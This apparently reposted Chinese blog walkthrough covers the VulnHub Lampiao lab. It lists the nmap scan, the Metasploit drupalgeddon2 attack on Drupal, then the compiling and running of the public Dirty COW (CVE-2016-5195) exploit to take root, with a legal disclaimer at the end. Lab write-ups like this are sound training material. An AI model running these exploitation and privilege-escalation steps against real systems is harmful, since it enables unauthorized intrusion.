VulnHubLampiao-Linux脏牛提权漏洞

admin 2024年2月15日19:53:38评论25 views字数 1960阅读6分32秒阅读模式

漏洞简介

脏牛内核漏洞是一种本地提权漏洞, 该漏洞是由于COW((Copy-on-Write))机制的实现问题导致的。具体来说,该漏洞利用了Copy-on-Write机制中的一个竞态条件(Race Condition),攻击者可以利用这个竞态条件来获取对一个本来只读的文件的写权限,从而提升为本地管理员权限。 

漏洞编号

CVE-2016-5195

漏洞危害

本地提权

影响版本

Linux kernel>2.6.22的所有Linux系统(即:从2007年发布的2.6.22开始,到2016年10月18日位置,这中间发行的所有Linux系统都受影响)

目的:拿下Lampiao靶机权限和flag

漏洞演示

靶机下载地址:(vulnhubhttps://download.vulnhub.com/lampiao/Lampiao.zip

下载完成后,vmware载入虚拟机,完成靶机搭建

攻击机:kali

1.开启靶机

VulnHubLampiao-Linux脏牛提权漏洞2. 打开攻击机kali,探测靶机ip,因为靶机和攻击机处于同一网段下,所以用nmap探测存活主机,判断靶机ip

这里攻击机的ip是192.168.137.138,所以我们扫描该网段,探测到该靶机的ip为192.168.137.146

nmap 192.168.137.0/24

VulnHubLampiao-Linux脏牛提权漏洞

3.紧接着我们用nmap对该ip进行全端口的扫描

nmap -p 1-65535 192.168.137.146

VulnHubLampiao-Linux脏牛提权漏洞4. 这里我们发现1898端口是开放的,我们用浏览器访问看看

http://192.168.137.146:1898

VulnHubLampiao-Linux脏牛提权漏洞在该网页的最后部分发现了一个东西:powered by Drupal

VulnHubLampiao-Linux脏牛提权漏洞5. 这是一个很重要的信息, 我们可以尝试查询Drupal是否有公开漏洞,可以用搜索引擎找,也可以用MSF,这里我们用MSF。 

启动MSF(kali自带MSF)

VulnHubLampiao-Linux脏牛提权漏洞6. 输入search Drupal寻找攻击模块

7. 尝试选择一个2018年的进行攻击,看是否能够成功  

use nuix/webapp/drupal_drupalgeddon2

8.显示该模块的可用选项,发现需要指定主机和端口,因此我们进行设定,然后开始渗透。

show options

VulnHubLampiao-Linux脏牛提权漏洞

set rhosts ip
set rport 端口
exploit

VulnHubLampiao-Linux脏牛提权漏洞9.渗透攻击成功,看本地用户是否为root,若非root,进行本地提权

VulnHubLampiao-Linux脏牛提权漏洞

将攻击机上的漏洞探针上传到靶机

upload exploit/unix/webapp/drupal_drupalgeddon2

VulnHubLampiao-Linux脏牛提权漏洞

10. 上传后确定上传成功,然后进入shell模式,执行脚本,但是发现被拒绝,我们更改文件的执行权限后再执行,执行成功  

shell
cd /tmp
./1.sh
chmod +x 1.sh
./1.sh

VulnHubLampiao-Linux脏牛提权漏洞11.执行成功后,探测到相应的漏洞及其信息,发现含有一个脏牛内核漏洞

VulnHubLampiao-Linux脏牛提权漏洞12.开始进行提权,根据地址下载EXP,运行EXP

下载官方地址:https://github.com/gbonacini/CVE-2016-5195

将exp从攻击机上传到靶机上

upload /tmp/dcow.cpp /tmp/dcow.cpp

VulnHubLampiao-Linux脏牛提权漏洞

13. 利用g++进行编译成可执行文件,首先先进入shell模式中。 

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow dcow.cpp -lutil     //将dcow.cpp文件编译成dcow可执行文件

VulnHubLampiao-Linux脏牛提权漏洞

14.使用python创建一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

15.执行./dcow,获取了密码:dirtyCowFun

VulnHubLampiao-Linux脏牛提权漏洞

16.使用ssh远程连接,连接成功

VulnHubLampiao-Linux脏牛提权漏洞拿到root权限

VulnHubLampiao-Linux脏牛提权漏洞

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(巢安实验室):VulnHub--Lampiao-Linux脏牛提权漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日19:53:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHubLampiao-Linux脏牛提权漏洞https://cn-sec.com/archives/2172352.html

发表评论

匿名网友 填写信息